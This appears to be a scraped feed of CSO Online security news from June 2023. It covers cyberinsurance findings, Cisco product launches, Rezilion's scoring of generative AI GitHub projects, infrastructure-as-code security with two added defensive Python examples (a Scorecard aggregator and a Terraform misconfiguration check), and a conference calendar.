"A significant part of the lack of visibility is the capabilities of the tools that the organization is using, but another significant portion is either a lack of understanding or a misconfiguration of the organization's attack surface," Steffen added. "Constantly changing enterprise environments -- from new technologies to updates, new vendors, and third-party connections -- also sometimes contribute to the attack surface."

Additionally, the report found 65% of security teams lacked qualified resources, leading to significant burnout among senior leaders and their team members.

Preferred measures include zero trust, cyberinsurance

Fifty-eight percent of respondents took defensive actions in the form of shifting to (or increasing) zero trust in the last year. According to the report, this was caused by a mix of factors, including increased global tensions and leading nation-state actors, globally distributed devices, and the White House's new cybersecurity strategy.

A significant number (91%) of the respondents said their organization has cyberinsurance in place; however, over a quarter (27%) do not understand the total obligations of their insurance policy.

This is because the insurance market itself is in flux, with changing standards, claim processes, and policy assessment types, according to Steffen. "According to a recent EMA survey, 75% of ransomware payees reported that paying the ransom resolved all the expected problems, while another 22% and 53% considered paying the ransom as cost and downtime saving respectively."

The study recommended that CISOs and cybersecurity professionals have clearer conversations with security teams about business operations to identify key threats and protect assets effectively.

CSO and CISO, Cyberattacks
https://www.csoonline.com/article/643881/attack-surface-visibility-a-top-ciso-priority-amid-growing-attacks-report.html
Cisco launches new network, security, and observability solutions and previews generative AI capabilities for Webex and Security Cloud Wed, 28 Jun 2023 16:01:03 +0000

A tremendous number of enterprises and service providers view Cisco as the nexus of their network, security, and cloud operations. At the company's Cisco Live customer and partner conference in June, Cisco boldly connected the dots of a network- and cloud-based ecosystem that ties together innovative technologies to drive productivity, resiliency, and growth, while also showcasing its artificial intelligence (AI) capabilities.

Cisco's market share for ethernet switches was 43.3% for 2022, according to IDC's tracker report, while combined service provider and enterprise router revenue accounted for 35.1% of the total market. Network World named Cisco #1 in its 2022 list of "the top 10 vendors providing corporate networks with everything from SASE and NaaS to ZTNA and network automation."

Cisco believes it's best positioned to help customers seamlessly manage networking domains, provide secure frictionless cloud access, and provide observability into the full stack of network and applications to quickly diagnose and remediate performance problems.

At Cisco Live, the company backed that up with a bold set of launches, including:

  • Cisco Networking Cloud. A strategic vision to deliver a single, integrated management platform experience for both on-prem and cloud operating models, to help customers manage all Cisco networking products from one place.
  • Cisco Secure Access. A security service edge (SSE) solution for its Cisco Security Cloud platform designed to simplify security experiences in today's hybrid world for frictionless cloud access across any location, any device, and any application.
  • Full Stack Observability (FSO). Cisco's FSO Platform is designed as a unified, extensible platform that is focused on OpenTelemetry. This vendor-agnostic solution empowers customers and partners to seamlessly bring together Metrics, Events, Logs, and Traces (MELT) data from multiple domains to enable new use cases, while elevating and securing digital experiences.
  • Generative AI to empower security and productivity. Cisco announced it is harnessing large language models (LLMs) across its Security and Collaboration portfolios to help organizations drive productivity and simplicity for their workforce.
    • The Cisco Security Cloud leverages a generative AI assistant that addresses two use cases. This includes an SOC Assistant to dramatically increase the threat response speed and effectiveness of the Security Operations Center (SOC). Cisco's Policy Assistant simplifies policy management and enables Security and IT administrators to describe granular security policies and evaluate how to best implement them across different aspects of their security infrastructure.
    • Additionally, with new summarization capabilities in Webex, users can give prompts and ask questions, and automatically summarize meetings and contact center chats. This will drive real value by helping people collaborate better and increase productivity at work.
  • Supercharging an 'unrivaled portfolio.' The new capabilities announced at Cisco Live are designed to help teams leverage end-to-end security monitoring, analysis, and remediation. This is what organizations need to build, deploy, and run secure cloud-native applications in today's distributed, multi-cloud environments. The new product line "supercharges its unrivaled portfolio that solves customer cloud application security challenges of today and the future," the company says.

That can't come soon enough for the IT and network teams crying out for simpler ways to manage their resources. "As Cisco's customers add billions of new connections to their enterprises and as more applications move to a multi-cloud environment, the network becomes even more critical," The Strategy Story observed in early 2023.

Cloud Security
https://www.csoonline.com/article/643860/cisco-launches-new-network-security-and-observability-solutions-and-previews-generative-ai-capabilities-for-webex-and-security-cloud.html
Most popular generative AI projects on GitHub are the least secure Wed, 28 Jun 2023 14:27:11 +0000

Researchers from software supply chain security firm Rezilion have investigated the security posture of the 50 most popular generative AI projects on GitHub. They found that the more popular and newer a generative AI open-source project is, the less mature its security is. Rezilion used the Open Source Security Foundation (OpenSSF) Scorecard to evaluate the large language model (LLM) open-source ecosystem, highlighting significant gaps in security best practices and potential risks in many LLM-based projects. The findings are published in the Expl[AI]ning the Risk report, authored by researchers Yotam Perkal and Katya Donchenko.

The emergence and popularity of generative AI technology based on LLMs has been explosive, with machines now possessing the ability to generate human-like text, images, and even code. The number of open-source projects integrating these technologies has grown significantly. For example, there are currently more than 30,000 open-source projects on GitHub using the GPT-3.5 family of LLMs, despite OpenAI only debuting ChatGPT seven months ago.

Despite their demand, generative AI/LLM technologies introduce security issues ranging from the risks of sharing sensitive business information with advanced self-learning algorithms to malicious actors using them to significantly enhance attacks. Earlier this month, the Open Worldwide Application Security Project (OWASP) published the top 10 most critical vulnerabilities often seen in LLM applications, highlighting their potential impact, ease of exploitation, and prevalence. Examples of vulnerabilities included prompt injections, data leakage, inadequate sandboxing, and unauthorized code execution.

What is the OpenSSF Scorecard?

The OpenSSF Scorecard is a tool created by the OpenSSF to assess the security of open-source projects and help improve them. It bases its assessment on facts about the repository, such as the number of vulnerabilities it has, how often it's maintained, and whether it contains binary files. Running Scorecard on a project checks different parts of its software supply chain, including the source code, build dependencies, testing, and project maintenance.

The purpose of the checks is to ensure adherence to security best practices and industry standards. Each check has a risk level associated with it, representing the estimated risk associated with not adhering to a specific best practice. Individual check scores are then compiled into a single aggregate score to gauge the overall security posture of a project.

Currently, there are 18 checks, which can be divided into three themes: holistic security practices, source code risk assessment, and build process risk assessment. The Scorecard assigns each check a score on an ordinal scale from 0 to 10 together with a risk level. A project with a score nearing 10 indicates a highly secure and well-maintained posture, whereas a score approaching 0 represents a weak security posture with inadequate maintenance and increased exposure to open-source risks.
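The scoring just described can be reproduced in a few lines. The block below is an added example, not Scorecard's own code: it assumes the risk weights the Scorecard project documents (Critical 10, High 7.5, Medium 5, Low 2.5), a risk-weighted mean as the aggregate, and that checks that could not run (score -1) are left out; the per-check scores are constructed to resemble a young, popular project.

```python
"""Aggregate an OpenSSF-Scorecard-style set of check results.

Added example; not code from the Scorecard project. Assumptions (labelled):
  - risk weights Critical=10, High=7.5, Medium=5, Low=2.5 (as documented by
    the Scorecard project at the time of writing),
  - the aggregate is the risk-weighted mean of the per-check scores,
  - a score of -1 (inconclusive) is excluded from the aggregate.
"""
from dataclasses import dataclass

# Assumed weights per risk tier (see module docstring).
RISK_WEIGHT = {"Critical": 10.0, "High": 7.5, "Medium": 5.0, "Low": 2.5}


@dataclass(frozen=True)
class CheckResult:
    name: str   # Scorecard check name, e.g. "Branch-Protection"
    risk: str   # risk tier the check belongs to
    score: int  # 0..10, or -1 when the check could not be evaluated


def aggregate_score(results):
    """Risk-weighted mean of the check scores, rounded to one decimal."""
    numerator = denominator = 0.0
    for r in results:
        if r.score < 0:          # inconclusive: skip, do not count as 0
            continue
        if r.score > 10:
            raise ValueError(f"{r.name}: score {r.score} out of range 0..10")
        if r.risk not in RISK_WEIGHT:
            raise ValueError(f"{r.name}: unknown risk tier {r.risk!r}")
        weight = RISK_WEIGHT[r.risk]
        numerator += weight * r.score
        denominator += weight
    if denominator == 0:         # nothing evaluable
        return 0.0
    return round(numerator / denominator, 1)


def priority_gaps(results, threshold=5):
    """Critical/High checks scoring below threshold, worst first.

    This is the remediation order a maintainer would usually work through:
    low scores in the heaviest-weighted tiers drag the aggregate most.
    """
    gaps = [
        r for r in results
        if 0 <= r.score < threshold
        and RISK_WEIGHT[r.risk] >= RISK_WEIGHT["High"]
    ]
    gaps.sort(key=lambda r: (r.score, -RISK_WEIGHT[r.risk], r.name))
    return [r.name for r in gaps]


# Constructed sample: real Scorecard check names and tiers, invented scores
# for a hypothetical fast-growing LLM project (not any real repository).
SAMPLE_RESULTS = [
    CheckResult("Binary-Artifacts", "High", 10),
    CheckResult("Branch-Protection", "High", 0),
    CheckResult("Code-Review", "High", 2),
    CheckResult("Dangerous-Workflow", "Critical", 10),
    CheckResult("Dependency-Update-Tool", "High", 0),
    CheckResult("Maintained", "High", 10),
    CheckResult("Pinned-Dependencies", "Medium", 1),
    CheckResult("SAST", "Medium", 0),
    CheckResult("Security-Policy", "Medium", 0),
    CheckResult("Signed-Releases", "High", -1),   # no releases: inconclusive
    CheckResult("Token-Permissions", "High", 0),
    CheckResult("Vulnerabilities", "High", 10),
    CheckResult("Fuzzing", "Medium", 0),
    CheckResult("License", "Low", 10),
    CheckResult("CII-Best-Practices", "Low", 0),
]

if __name__ == "__main__":
    print("aggregate:", aggregate_score(SAMPLE_RESULTS))   # 4.2
    print("fix first:", priority_gaps(SAMPLE_RESULTS))
```

Note how a project can pass every vulnerability and binary-artifact check and still land near the 4.6 average the report cites, because unprotected branches, unreviewed merges and over-broad workflow tokens sit in the heavily weighted tiers.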

Most popular open-source generative AI projects the least secure

Rezilion's research revealed a troubling trend: The more popular a generative AI/LLM project is (based on GitHub's star popularity rating system), the lower its security score (based on the OpenSSF Scorecard). "This highlights the fact that the popularity of a project alone is not a reflection of its quality, let alone its security posture," the researchers wrote. The most popular GPT-based project on GitHub, Auto-GPT, which has over 138,000 stars and is less than three months old, has a Scorecard score of just 3.7, according to the report. The average score among the 50 projects checked isn't much better at 4.6 out of 10.

For wider context, the researchers compared the risk of the most-popular generative AI and LLM projects on GitHub with other popular open-source projects on the platform that are not generative AI- or LLM-related. They analyzed a group of 94 critical projects (defined by the OpenSSF Securing Critical Projects Work Group) with an average Scorecard score of 6.18, along with a group of seven projects that use the OpenSSF Scorecard as part of their SDLC workflow, with an average score of 7.37.

"The maturity and security posture of the open-source ecosystem surrounding LLMs leave a lot to be desired," the researchers wrote. "In fact, as these systems gain more popularity and adoption, and as long as the security standards in which they are developed and maintained remain the same, it seems inevitable that they will become the target of attackers, and significant vulnerabilities affecting them will continue to surface."

Generative AI, LLMs risks will increase over next 12-18 months

The risks posed to organizations by generative AI/LLMs are expected to evolve over the next 12 to 18 months as the popularity and adoption of these systems continue to grow, said Yotam Perkal, director of vulnerability research at Rezilion. "Without significant improvements in the security standards and practices surrounding LLMs, the likelihood of targeted attacks and the discovery of vulnerabilities in these systems will increase. Organizations must stay vigilant and prioritize security measures to mitigate evolving risks and ensure the responsible and secure use of LLM technology."

Organizations can prepare for LLM risks by adopting a secure-by-design approach when developing generative AI-based systems. They should also leverage existing frameworks like the Secure AI Framework (SAIF), NeMo Guardrails, or MITRE ATLAS to incorporate security measures into their AI systems, Perkal added. "It is also imperative to monitor and log LLM interactions and regularly audit and review the LLM's responses to detect potential security and privacy issues and update and fine-tune the LLM accordingly. Responsibility for preparing and mitigating LLM risks lies with both the organizations integrating the technology and the developers involved in building and maintaining these systems."

Application Security, Generative AI, Open Source
https://www.csoonline.com/article/643505/most-popular-generative-ai-projects-on-github-are-the-least-secure.html 643505
Enhancing cloud infrastructure security via infrastructure as code Wed, 28 Jun 2023 13:23:13 +0000

As more and more companies move to digitize their operations, cloud adoption is growing in kind. According to one Microsoft survey, 86% of businesses plan to increase their investment in hybrid or multi-cloud technology and 95% believe it is critical to their business success.

Yet, cloud technology is not without its challenges. The same advantages that make cloud technology an invaluable resource for scalability, agility, and collaboration can also make it a security liability.

When dealing with multiple cloud platforms or a blend of on-premises and cloud technology, it can be difficult to create a centralized view of your entire network or to contextualize security alerts to understand their impact on the organization as a whole. There's also the risk of misconfigured cloud infrastructure entitlements, which can lead to overprivileged access to infrastructure and heighten your risk of exploitation and infiltration.

Organizations need a reliable way to secure their hybrid and multi-cloud environments. That's where infrastructure-as-code (IaC) comes in. When infrastructure automation companies like HashiCorp and cloud providers like Microsoft work in tandem, they can leverage best practices in cloud security and IaC to deliver a more secure infrastructure for their customers. Read on to learn how.

What are the benefits of infrastructure as code?

The global IaC market is growing rapidly, jumping from an $800 million valuation in 2022 to a projected $2.3 billion in 2027. Much of this growth is due to the inherent benefits of IaC, namely its promise of automation, scalability, and repeatability.

Essentially, because IaC enables organizations to manage and provision infrastructure through code rather than manual processes, organizations can more easily scale their operations to meet current business needs. Once you create your first workload using IaC, you can then reuse that same code to build subsequent pieces of infrastructure--reducing the load on development teams and enabling improved code sharing.

"Using pre-approved patterns or code widely across the enterprise enables companies to essentially self-service their workloads. This empowers users and business teams alike. When you introduce infrastructure as code to the organization via the right automation, this makes it much simpler for them and allows for tangible benefits that make the organization run faster." - Arnaud Lheureux, Lead Architect of Strategic Partnerships at Microsoft

Organizations can also use IaC to codify and document configuration specifications and changes. This is especially critical when dealing with complex hybrid or multi-cloud environments because it provides clear visibility into where exactly a piece of code was integrated.

In the event of a security patch or code error, developers can quickly update the system where needed and test any changes within a pre-defined framework before launching the update. This visibility and documentation are also helpful for companies that operate in highly regulated spaces and need to remain compliant with certain industry standards.

How infrastructure as code drives increased cloud security

A key element of IaC is its repeatability. And while we've discussed the workload and scalability benefits, it also has significant implications for security. This is because development teams can rigorously validate and test their code against a pre-defined security framework like NIST or a Cloud Adoption Framework before ever deploying it in their cloud environment. This helps create a high level of confidence that the code will not introduce new security vulnerabilities into their environment.

"From a security perspective, infrastructure as code pushes companies to think about how they can build pre-approved, pre-defined modules that allow them to achieve an outcome. They're not just configuring something within a user interface on the fly--which creates room for human error--they're building a piece of code that can be validated, vetted, and tested to create a baseline security construct." - David Wright, Global Staff Solutions Engineering Lead at HashiCorp

However, if organizations fail to validate their code or they unknowingly introduce a misconfiguration in their IaC module, that error can then be propagated across the entire cloud infrastructure--ultimately creating a wide attack surface.

To combat this risk, companies can leverage tools like Defender for DevOps to create stronger collaboration between security and development teams. This enables security teams to review security hygiene and identify critical IaC misconfigurations, providing clear guidance back to the developers on the severity of the issue and how to remediate it.
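The validation gate described above, as an added example (not code from Microsoft, HashiCorp, or Defender for DevOps): a Python policy check that runs over a Terraform plan before anything is applied, so a misconfigured module is caught once rather than propagated across every deployment built from it. The plan layout mirrors the `resource_changes` / `change.after` JSON that `terraform show -json` emits, and the attribute names follow the azurerm provider, but both are assumptions for this illustration; the sample plan is constructed and embeds a public storage account, an inbound RDP rule open to any source, and a subscription-wide Owner assignment (the overprivileged entitlement case mentioned earlier) alongside one clean resource.

```python
"""Pre-deployment policy gate over a Terraform plan (added example).

Assumptions: plan structure mirrors `terraform show -json` output
(resource_changes / change.after); attribute names follow the azurerm
provider. Neither is code from Microsoft or HashiCorp.
"""
import json
import sys

# Constructed sample plan: three findings expected, one clean resource.
SAMPLE_PLAN = json.dumps({
    "resource_changes": [
        {"address": "azurerm_storage_account.logs",
         "type": "azurerm_storage_account",
         "change": {"actions": ["create"],
                    "after": {"name": "logsstore",
                              "allow_nested_items_to_be_public": True}}},
        {"address": "azurerm_network_security_rule.rdp",
         "type": "azurerm_network_security_rule",
         "change": {"actions": ["create"],
                    "after": {"name": "allow-rdp", "direction": "Inbound",
                              "access": "Allow", "source_address_prefix": "*",
                              "destination_port_range": "3389"}}},
        {"address": "azurerm_role_assignment.ci",
         "type": "azurerm_role_assignment",
         "change": {"actions": ["create"],
                    "after": {"role_definition_name": "Owner",
                              "scope": "/subscriptions/00000000-0000-0000-0000-000000000000"}}},
        {"address": "azurerm_storage_account.app",
         "type": "azurerm_storage_account",
         "change": {"actions": ["create"],
                    "after": {"name": "appstore",
                              "allow_nested_items_to_be_public": False}}},
    ]
})

ADMIN_PORTS = {22, 3389}                       # SSH and RDP
ANY_SOURCE = {"*", "Internet", "0.0.0.0/0"}     # NSG "from anywhere" spellings
PRIVILEGED_ROLES = {"Owner", "Contributor", "User Access Administrator"}


def port_range_covers(port_range, port):
    """True if an NSG port expression ('*', '3389' or '3000-4000') includes port."""
    if not port_range:
        return False
    if port_range == "*":
        return True
    if "-" in port_range:
        low, high = (int(p) for p in port_range.split("-", 1))
        return low <= port <= high
    return int(port_range) == port


def check_storage(after):
    if after.get("allow_nested_items_to_be_public"):
        yield "high", "storage account allows public access to blobs/containers"


def check_nsg_rule(after):
    open_to_world = (after.get("direction") == "Inbound"
                     and after.get("access") == "Allow"
                     and after.get("source_address_prefix") in ANY_SOURCE)
    if open_to_world:
        for port in ADMIN_PORTS:
            if port_range_covers(after.get("destination_port_range", ""), port):
                yield "critical", f"inbound port {port} allowed from any source"


def check_role(after):
    scope = after.get("scope", "")
    subscription_wide = scope.startswith("/subscriptions/") and "/resourceGroups/" not in scope
    if after.get("role_definition_name") in PRIVILEGED_ROLES and subscription_wide:
        yield "critical", f"{after['role_definition_name']} granted at subscription scope"


CHECKS = {
    "azurerm_storage_account": check_storage,
    "azurerm_network_security_rule": check_nsg_rule,
    "azurerm_role_assignment": check_role,
}


def evaluate_plan(plan_json):
    """Return findings as dicts with 'address', 'severity' and 'message'."""
    findings = []
    for rc in json.loads(plan_json).get("resource_changes", []):
        change = rc.get("change", {})
        if change.get("actions") == ["delete"]:
            continue  # nothing will exist after apply, so nothing to check
        check = CHECKS.get(rc.get("type"))
        if check is None:
            continue
        for severity, message in check(change.get("after") or {}):
            findings.append({"address": rc["address"], "severity": severity, "message": message})
    return findings


def main(plan_json=SAMPLE_PLAN):
    """Print findings; return 1 (block the pipeline) if any finding is critical."""
    findings = evaluate_plan(plan_json)
    for f in findings:
        print(f"[{f['severity']}] {f['address']}: {f['message']}")
    return 1 if any(f["severity"] == "critical" for f in findings) else 0


if __name__ == "__main__":
    sys.exit(main())
```

Wired into CI as a step between `terraform plan` and `terraform apply`, a non-zero exit from `main()` stops the rollout and the printed findings go back to the developer with the severity and the resource address to fix, which is the review loop the paragraph above describes.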

As an additional security measure, Microsoft also partners with companies like HashiCorp to create pre-defined IaC modules that align with cybersecurity best practices. This enables organizations to embed security tooling directly into their environment, creating secure, compliant, and easily maintainable cloud deployments.

Cloud computing is only going to continue to grow in popularity as more companies adopt digital ways of working. When used in concert with cybersecurity best practices, IaC is a powerful tool that enables us to equip and defend the next generation of cloud-enabled workers.

To learn more about cloud security and the benefits of IaC, visit Microsoft Security Insider and check out the HashiCorp blog.

Cloud Security
https://www.csoonline.com/article/643773/enhancing-cloud-infrastructure-security-via-infrastructure-as-code.html 643773
The CSO guide to top security conferences Wed, 28 Jun 2023 09:00:00 +0000

There is nothing like attending a face-to-face event for career networking and knowledge gathering, and we don't have to tell you how helpful it can be to get a hands-on demo of a new tool or to have your questions answered by experts. Fortunately, plenty of great conferences are coming up in the months ahead. If keeping abreast of security trends and evolving threats is critical to your job -- and we know it is -- then attending some top-notch security conferences is on your must-do list for 2023 and 2024.

From major events to those that are more narrowly focused, this list from the editors of CSO will help you find the security conferences that matter the most to you. We'll keep it updated with registration deadlines and new conferences, so check back often. While we don't expect this calendar to be comprehensive, we do aim to have it be highly relevant. If there's something we've missed, let us know. You can email your additions, corrections and updates to Michael Nadeau.

June 2023

AppSecCon 2023, Virtual: June 28 – 29

Confidential Computing Summit, San Francisco, California: June 29

Detroit Cybersecurity Conference, Detroit, Michigan: June 29

SecureRhythm 2023, London, UK: June 29

July 2023

SANS Cyber Defence India, TBD, July 3 – 8

SANS London, Virtual and London, UK: July 3 – 8

SANS Cyber Defence Singapore, Singapore: July 3 – 15

Identity Management DACH 2023 Q3, Frankfurt, Germany: July 6

BSides Milano, Milano, Italy: July 8

SANS Amsterdam, Virtual and Amsterdam, Netherlands: July 10 – 15

SANS Cyber Defence Korea 2023, Seoul, South Korea: July 10 – 15

SANSFIRE Washington, DC 2023, Virtual and Washington, DC: July 10 – 15

Singapore Summit: Cybersecurity Conference, Singapore: July 11

Orange County CyberSecurity Conference, Virtual and TBD: July 12

Philadelphia Cybersecurity Conference, Philadelphia, Pennsylvania: July 13

Cybersecurity Roadshow Central America, Virtual: July 14

BSidesCDMX, Mexico City, Mexico: July 14

SANS Cloud Security — San Francisco 2023, Virtual and San Francisco, California: July 17 – 22

SANS Pen Test Hackfest Europe 2023, Virtual and Berlin, Germany: July 17 – 22

Healthcare Summit, TBD: July 18

2023 Northeast Virtual Cybersecurity Summit, Virtual: July 20

BSidesBasingstoke, Basingstoke, UK: July 21

BSidesPGH, Pittsburgh, Pennsylvania: July 21

BSidesJaipur, Jaipur, India: July 22

SANS New York City 2023, Virtual and New York, New York: July 24 – 29

Gartner Security & Risk Management Summit, Tokyo, Japan: July 26 – 28

2023 CSO Global Cyber ​​Security Conference, Shanghai, China: July 27

IDC Cybersecurity Roadshow Mexico, Virtual and TBD: July 27

Tampa CyberSecurity Conference, Virtual and Tampa, Florida: July 27

Gartner Security & Risk Management Summit, Tokyo, Japan: July 27 – 28

BSidesTLV, Tel Aviv, Israel: July 29

SANS Los Angeles 2023, Virtual and Los Angeles, California: July 31 – August 5

August 2023

DFIR Summit & Training 2023, Virtual and Austin, Texas: August 3 – 10

Ringzer0 Zer0 Gravity 2023, Las Vegas, Nevada: August 5 – 8

Black Hat USA 2023, Las Vegas, Nevada: August 5 – 10

SANS London, Virtual and London, UK: August 7 – 12

SANS Nashville, Virtual and Nashville, Tennessee: August 7 – 12

SANS New Delhi, Virtual and TBD: August 7 – 12

BSidesLV, Las Vegas, Nevada: August 8 – 9

Indianapolis CyberSecurity Conference, Virtual and Indianapolis, Indiana: August 10

Vancouver Cybersecurity Conference, Vancouver, Washington: August 10

BSidesTucson, Tucson, Arizona: August 11 – 12

AcceleRise, Denver, Colorado: August 14 – 16

SANS Amsterdam, Virtual and Amsterdam, Netherlands: August 14 – 19

SANS Chicago, Virtual and Chicago, Illinois: August 14 – 19

SANS Melbourne Australia 2023, Virtual and Melbourne, Australia: August 14 – 19

IDC Security Roadshow, Johannesburg, South Africa: August 17

BSidesPerth, Perth, Australia: August 19

SANS Riyadh Cyber Leaders 2023, Riyadh, Saudi Arabia: August 20 – 24

Hack In The Box Security Conference, Virtual and Phuket, Thailand: August 21 – 25

SANS Security Awareness Summit & Training, Virtual and Las Vegas, Nevada: August 21 – 25

SANS Cyber Defence Singapore, Virtual and Singapore: August 21 – 26

SANS Virginia Beach, Virtual and Virginia Beach, Virginia: August 21 – September 1

Salt Lake City CyberSecurity Conference, Virtual and Salt Lake City, Utah: August 23

SecureWorld Manufacturing, Virtual: August 23

Cybersecurity Summit: New Delhi, New Delhi, India: August 23 – 24

IDC Cybersecurity Roadshow Brazil, Virtual and TBD: August 24

Raleigh Cybersecurity Conference, Raleigh, North Carolina: August 24

Blue Team Con, Chicago, Illinois: August 25 – 27

SANS Copenhagen, Copenhagen, Denmark: August 28 – September 2

September 2023

BSidesKrakow, Krakow, Poland: September 2

SANS Cloud Security London, Virtual and London, UK: September 4 – 9

SANS Spring Australia 2023, Virtual and Sydney, Australia: September 4 – 16

IDC Security Forum, Zurich, Switzerland: September 6

SANS Network Security Las Vegas 2023, Virtual and Las Vegas, Nevada: September 6 – 11

Charlotte CyberSecurity Conference, Virtual and Charlotte, North Carolina: September 7

BSidesColumbus, Columbus, Ohio: September 7 – 8

APAC DFIR Summit & Japan, Virtual and Tokyo, Japan: September 7 – 16

BSidesAlbuquerque, Albuquerque, New Mexico: September 8 – 9

BSidesMelbourne, Melbourne, Australia, September 8 – 10

BSidesNoVA, Arlington, Virginia: September 9

BSidesZH, Zurich, Switzerland: September 9

Global Security Exchange (GSX), Dallas, Texas: September 11 – 13

SANS Stay Sharp, Virtual: September 11 – 15

SANS Brussels, Virtual and Brussels, Belgium: September 11 – 16

IDC Security Forum, Frankfurt, Germany: September 12

Copenhagen CyberCrime Conference 2023, Virtual and Copenhagen, Denmark: September 12 – 13

St. Louis Cybersecurity Conference, St. Louis, Missouri: September 14

BSidesFrankfurt, Frankfurt, Germany: September 15

BSidesStPete, St. Petersburg, Florida: September 15 – 16

BSidesMTL, Montreal, Canada: September 16

SANS Doha, Doha, Qatar: September 16 – 21

Mandiant Worldwide Information Security Exchange (mWISE), Washington, DC: September 18 – 20

SANS Human Risk Oslo, Oslo, Norway: September 18 – 20

SECtember 2023, Bellevue, Washington: September 18 – 22

SANS Indonesia, Jakarta, Indonesia: September 18 – 23

SANS Maryland – Rockville 2023, Virtual and Rockville, Maryland: September 18 – 23

SANS Rome, Rome, Italy: September 18 – 23

SANS Secure Brasil 2023, Virtual and Sao Paulo, Brasil: September 18 – 23

SANS Paris, Virtual and Paris, France: September 18 – 30

BSidesBelfast, Belfast, Northern Ireland: September 19

IDC Security Forum, Helsinki, Finland: September 19

IDC Security Summit, Istanbul, Turkiye: September 19

London Summit, London, UK: September 19

SecureWorld Denver, Denver, Colorado: September 19

IDC Security Forum, Oslo, Norway: September 20

IDC Security Roadshow, Cairo, Egypt: September 20

International Cryptographic Module Conference (ICMC) 2023, Ottawa, Canada: September 20 – 22

BSidesOslo, Oslo, Norway: September 21

BSides Tallinn, Tallinn, Estonia: September 21

Des Moines CyberSecurity Conference, Virtual and Des Moines, Iowa: September 21

IDC Security Forum, Stockholm, Sweden: September 21

BSidesTirana, Tirana, Albania: September 21 – 22

BSidesRDU, Raleigh/Durham, North Carolina: September 22

BSidesSG, Singapore: September 22

SANS OSINT Summit 2023, Virtual: September 22

BSidesIdahoFalls, Idaho Falls, Idaho: September 22 – 23

BSidesCambridge, Cambridge, UK: September 23

InfoSec World, Buena Vista, Florida: September 25 – 27

SANS Bucharest, Bucharest, Romania: September 25 – 30

SANS ICS Security Houston 2023, Virtual and Houston, Texas: September 25 – 30

SANS Managing Security Risk 2023, Virtual: September 25 – 30

SANS Seattle 2023, Virtual and Seattle, Washington: September 25 – 30

IDC Security Forum, Vienna, Austria: September 26

IDC Security Forum, Nieuwegein, Netherlands: September 26

International Cyber Expo 2023, London, UK: September 26 – 27

Gartner Security & Risk Management Summit, London, UK: September 26 – 28

Relativity Fest, Chicago, Illinois: September 26 – 28

IDC Security Forum, Antwerp, Belgium: September 27

IDC Security Forum, Copenhagen, Denmark: September 28

IDC Security Roadshow Chile, Virtual and TBD: September 28

Seattle Cybersecurity Conference, Seattle, Washington: September 28

SecureWorld Detroit, Detroit, Michigan: September 28

BSidesCanberra, Canberra, Australia: September 28 – 30

October 2023

SANS DFIR Europe Summit & Training 2023, Virtual and Prague, Czech Republic: October 1 – 7

*CSO50 Conference + Awards, Fort McDowell, Arizona: October 2 – 4

SANS Executive Leadership Training 2023, Dulles, Virginia: October 2 – 6

SANS Amsterdam, Virtual and Amsterdam, Netherlands: October 2 – 7

SANS October Singapore 2023, Virtual and Singapore: October 2 – 14

Identity Week, Washington, DC: October 3 – 4

ONE Conference, The Hague, Netherlands: October 3 – 4

Graylog GO 2023, Virtual and Houston, Texas: October 3 – 5

Cybersecurity Summit: Africa, Virtual: October 4

Identity Management Europe 2023 Q4, Utrecht, Netherlands: October 4

BSidesAhmedabad, Ahmedabad, India: October 4 – 6

Columbus CyberSecurity Conference, Virtual and Columbus, Ohio: October 5

Blockchain Security Summit 2023, Virtual: October 5 – 6

BSidesKC, Kansas City, Missouri: October 6 – 7

BSidesPDX, Portland, Oregon: October 6 – 7

BSidesAugusta, Augusta, Georgia: October 7

BSidesColoradoSprings, Colorado Springs, Colorado: October 7 – 8

SANS Cyber Safari 2023, Virtual and Riyadh, Saudi Arabia: October 7 – 19

SANS Baltimore, Virtual and Baltimore, Maryland: October 9 – 14

SANS Brisbane Australia 2023, Brisbane, Australia: October 9 – 14

SANS Istanbul Offensive Operations 2023, Virtual and Istanbul, Turkiye: October 9 – 14

SANS London, Virtual and London, UK: October 9 – 14

SANS Nantes, Nantes, France: October 9 – 14

SANS San Francisco, Virtual and San Francisco, California: October 9 – 14

SANS India Cloud Security 2023, Virtual: October 9 – 21

it-sa, Nuremberg, Germany: October 10 – 12

Chicago Cybersecurity Conference, Chicago, Illinois: October 12

HOU.SEC.CON 2023, Houston, Texas: October 12 – 13

BSidesBloomington, Bloomington, Minnesota: October 13 – 14

BSidesJAX, Jacksonville, Florida: October 13 – 14

BSidesCambridgeMA, Cambridge, Massachusetts: October 14

BSidesSTL, St. Louis, Missouri: October 14

BSidesMunich, Munich, Germany: October 14 – 15

Rhythm World 23, Denver, Colorado: October 16 – 18

SANS Secure Africa 2023, Virtual and Casablanca, Morocco: October 16 – 21

CloudSecNext Summit & Training 2023, Virtual and Dallas, Texas: October 16 – 23

SANS Munich, Virtual and Munich, Germany: October 16 – 28

SANS Tokyo Autumn 2023, Virtual and Tokyo, Japan: October 16 – 28

Financial Services Summit, New York, New York: October 17

Securing New Ground (SNG), New York, New York: October 17 – 18

San Diego CyberSecurity Conference, San Diego, California: October 18

SecureWorld St. Louis, St. Louis, Missouri: October 19

SANS Manchester, Manchester, UK: October 23 – 28

SecTor, Toronto, Canada: October 23 – 26

SANS Rocky Mountain Fall 2023, Virtual and Denver, Colorado: October 23 – 28

LASCON 2023, Austin, Texas: October 24 – 27

SecureWorld Government, Virtual: October 25

(ISC)² Security Congress 2023, Virtual and Nashville, Tennessee: October 25 – 27

IDC Cybersecurity Roadshow Columbia, TBD: October 26

IDC Security, Warsaw, Poland: October 26

IDC Security & Cloud Roadshow, Porto, Portugal: October 26

SecureWorld Dallas, Dallas, Texas: October 26

Toronto Cybersecurity Conference, Toronto, Canada: October 26

BSidesOttawa: Ottawa, Ontario: October 26 – 27

IDC Security Forum: Security Strategy 2023, Virtual and Warsaw, Poland: October 26

BSidesBirmingham, Birmingham, UK: October 28

BSidesGVL, Greenville, South Carolina: October 28

BSidesPeoria, Peoria, Illinois: October 28

SANS Dublin, Dublin, Ireland: October 30 – November 4

SANS Orlando, Virtual and Orlando, Florida: October 30 – November 4

* This event is presented by Foundry, the parent company of CSO.

November 2023

*CSO’s Future of Cybersecurity Summit, TBD: TBD

Cybersecurity Summit: Mumbai, Mumbai, India: November 1 – 2

2023 Canada Virtual Cybersecurity Summit, Virtual: November 2

Phoenix CyberSecurity Conference, Virtual and Phoenix, Arizona: November 2

SANS Gulf Region 2023, Dubai, UAE: November 4 – 23

SANS Korea, Virtual and Seoul, South Korea: November 6 – 11

SANS London, Virtual and London, UK: November 6 – 11

